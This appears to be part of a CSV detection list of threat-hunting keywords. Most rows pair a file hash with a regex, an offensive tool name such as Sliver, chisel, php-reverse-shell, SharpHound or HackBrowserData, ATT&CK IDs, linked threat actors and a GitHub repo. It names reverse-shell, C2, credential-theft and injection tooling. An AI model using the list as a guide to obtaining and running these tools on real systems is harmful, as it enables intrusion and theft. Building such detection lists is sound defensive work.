"*c9dd616338b6ae5e80bb13fdb5474890eea5dec01daad27e519c2981eaaa0dee*",".{0,1000}c9dd616338b6ae5e80bb13fdb5474890eea5dec01daad27e519c2981eaaa0dee.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37394"
"*c9def37771dabf11171830fdd27b3b751955f40c577fae3f9691188ed3f90b08*",".{0,1000}c9def37771dabf11171830fdd27b3b751955f40c577fae3f9691188ed3f90b08.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","37395"
"*c9e18496bf7328f9ef0fc8f4d2958b1cb39e52a1a1d365666c8931def2068933*",".{0,1000}c9e18496bf7328f9ef0fc8f4d2958b1cb39e52a1a1d365666c8931def2068933.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37396"
"*c9e4ebc73927d640543ab65574a94eed4d072e59d366ab37be405605914fa42d*",".{0,1000}c9e4ebc73927d640543ab65574a94eed4d072e59d366ab37be405605914fa42d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","37397"
"*c9e90cee55ca810c9fd750d6816e523aa86dce12bbfbf3d448440bbdacdcb31c*",".{0,1000}c9e90cee55ca810c9fd750d6816e523aa86dce12bbfbf3d448440bbdacdcb31c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37399"
"*c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2*",".{0,1000}c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37400"
"*c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e*",".{0,1000}c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37402"
"*c9fb3bcd19b8d5dc86f3adf90f4953376910e796cddf0e2fdc1ee439be51b8de*",".{0,1000}c9fb3bcd19b8d5dc86f3adf90f4953376910e796cddf0e2fdc1ee439be51b8de.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","#filehash","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","37403"
"*c9fb545f82ab77dbd39435af7b84aa618dc47e8463722d9532f16172545a659f*",".{0,1000}c9fb545f82ab77dbd39435af7b84aa618dc47e8463722d9532f16172545a659f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37404"
"*c9fd001fed0cdce98f15a48956fc6ab60f3770a7e9d0e1368247dad940691048*",".{0,1000}c9fd001fed0cdce98f15a48956fc6ab60f3770a7e9d0e1368247dad940691048.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37405"
"*ca.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}ca\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","37406"
"*ca06ccf5e04e0ca3abd24fd5d8716a5fba124fd332abf89b8832e9e8b879ea0c*",".{0,1000}ca06ccf5e04e0ca3abd24fd5d8716a5fba124fd332abf89b8832e9e8b879ea0c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37408"
"*ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86*",".{0,1000}ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","37409"
"*ca0b9b718173dbd056497bf66d6ef7bd81ca4a52bda882e64b4d418c88121d7e*",".{0,1000}ca0b9b718173dbd056497bf66d6ef7bd81ca4a52bda882e64b4d418c88121d7e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37411"
"*ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d*",".{0,1000}ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","37412"
"*ca13fecd8bd94170c12cb9de6c12b644bdea34c9d8c14de6a4065b30c6b1c20a*",".{0,1000}ca13fecd8bd94170c12cb9de6c12b644bdea34c9d8c14de6a4065b30c6b1c20a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37413"
"*ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85*",".{0,1000}ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37414"
"*ca2034f590d15577047e447e717299856b1a4518fd2fe6eef04429c344e0f206*",".{0,1000}ca2034f590d15577047e447e717299856b1a4518fd2fe6eef04429c344e0f206.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37417"
"*ca2133708cc46f76d99471f39e68047c931a2f7b9927d89f010c042ac97bab80*",".{0,1000}ca2133708cc46f76d99471f39e68047c931a2f7b9927d89f010c042ac97bab80.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37418"
"*ca245e03a26fd178305f09c391ee065899ab88dd3de6663b397a84d411f310fc*",".{0,1000}ca245e03a26fd178305f09c391ee065899ab88dd3de6663b397a84d411f310fc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","37419"
"*ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af*",".{0,1000}ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","37420"
"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*",".{0,1000}CA280845\-1F10\-4E65\-9DE7\-D9C6513BBD91.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","#GUIDproject","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","37421"
"*ca2aa2a0ef687163b261bba61c0b55033e9c4080bfb889e48b7e4664a2af91ed*",".{0,1000}ca2aa2a0ef687163b261bba61c0b55033e9c4080bfb889e48b7e4664a2af91ed.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","37422"
"*ca2c406c54af4a1dc16d98a018d8d1e565dae5e95e250ccce1904dedf351e865*",".{0,1000}ca2c406c54af4a1dc16d98a018d8d1e565dae5e95e250ccce1904dedf351e865.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37423"
"*ca2d675d9ac02a80e7b2893de9a509f905075e56e0820924ae57da696a1ebd68*",".{0,1000}ca2d675d9ac02a80e7b2893de9a509f905075e56e0820924ae57da696a1ebd68.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37424"
"*ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172*",".{0,1000}ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37426"
"*ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f*",".{0,1000}ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37427"
"*ca3560757b7667c3b9ac2cca3b586493ef266b2b0591c1252d35f9e3a39cad08*",".{0,1000}ca3560757b7667c3b9ac2cca3b586493ef266b2b0591c1252d35f9e3a39cad08.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","37428"
"*ca378ad09474b4c41b94590b65d3cdf28cd8e28063f1f9c5aa753f8f1b1ed233*",".{0,1000}ca378ad09474b4c41b94590b65d3cdf28cd8e28063f1f9c5aa753f8f1b1ed233.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux #filehash","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","37429"
"*ca399318490eb76c9a598f4bfd193dc2281eced18c5ed432a41ef3eb540d673a*",".{0,1000}ca399318490eb76c9a598f4bfd193dc2281eced18c5ed432a41ef3eb540d673a.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","37430"
"*ca39b6544676022075793b762288a2d13bd3db50d4ce983c624931639dbb75c6*",".{0,1000}ca39b6544676022075793b762288a2d13bd3db50d4ce983c624931639dbb75c6.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","37431"
"*ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a*",".{0,1000}ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37432"
"*ca3dcfb3f0b373014cc646ecc851c83f5f44ee341073b51b536b2ee0caa84bbb*",".{0,1000}ca3dcfb3f0b373014cc646ecc851c83f5f44ee341073b51b536b2ee0caa84bbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37433"
"*ca541408d19d557cbbb2c099082190a61814e1b39a0fed6567fb1f473cc780b3*",".{0,1000}ca541408d19d557cbbb2c099082190a61814e1b39a0fed6567fb1f473cc780b3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37435"
"*ca56cf7dc2c29e1556f3fe3476ed76b18ab96372ca941bc92e22873c3472bd81*",".{0,1000}ca56cf7dc2c29e1556f3fe3476ed76b18ab96372ca941bc92e22873c3472bd81.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37436"
"*ca5ba9e7a694713dc8d1edc1be2dc4cef3b390566cb4b22088a85817d1b3eeda*",".{0,1000}ca5ba9e7a694713dc8d1edc1be2dc4cef3b390566cb4b22088a85817d1b3eeda.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37439"
"*ca5eb2b6344df155fa10a39bf815f65daa9663250e657a3e1a8ffc4416efe778*",".{0,1000}ca5eb2b6344df155fa10a39bf815f65daa9663250e657a3e1a8ffc4416efe778.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37440"
"*ca60f4e33d70143b3f928143510d75e39c20d35c1cdf90ee77fbf76928eac3b9*",".{0,1000}ca60f4e33d70143b3f928143510d75e39c20d35c1cdf90ee77fbf76928eac3b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37441"
"*ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362*",".{0,1000}ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","37443"
"*ca698d8da51b0df3302f8e8593f3fceecf8c513d92a73bc3b585363a4d09bc61*",".{0,1000}ca698d8da51b0df3302f8e8593f3fceecf8c513d92a73bc3b585363a4d09bc61.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37445"
"*ca6a84b59ef6e40ee3657dd79a54706818d66345725434ade357898aa6722f62*",".{0,1000}ca6a84b59ef6e40ee3657dd79a54706818d66345725434ade357898aa6722f62.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","37446"
"*ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab*",".{0,1000}ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37450"
"*ca6e34d55019477a50ab0f91cdef48d755a7d8e10bfc65851a6bf67bc50f7963*",".{0,1000}ca6e34d55019477a50ab0f91cdef48d755a7d8e10bfc65851a6bf67bc50f7963.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37451"
"*ca72920176afc726b5966675af9b6f025d4a3418235c3864f7df2a5c0010a5ee*",".{0,1000}ca72920176afc726b5966675af9b6f025d4a3418235c3864f7df2a5c0010a5ee.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37452"
"*ca7851a4dd97eeea65e46725df9dcd9de9c1aaaec270830a131fd821b23809ff*",".{0,1000}ca7851a4dd97eeea65e46725df9dcd9de9c1aaaec270830a131fd821b23809ff.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37453"
"*ca8066d0eb20a83470e87bb583f11a864146ea958321dae51c93b2272a9b5922*",".{0,1000}ca8066d0eb20a83470e87bb583f11a864146ea958321dae51c93b2272a9b5922.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37455"
"*ca8e5157e4c093be717f36225fc1fb1fb4ffb1cf404cc9738c9a9fb7d41da29d*",".{0,1000}ca8e5157e4c093be717f36225fc1fb1fb4ffb1cf404cc9738c9a9fb7d41da29d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37457"
"*ca94d5a554af633b96f7a6b0e4b8891b4a1e30812df356f7bc21e99dbce90d8e*",".{0,1000}ca94d5a554af633b96f7a6b0e4b8891b4a1e30812df356f7bc21e99dbce90d8e.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#filehash","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","37459"
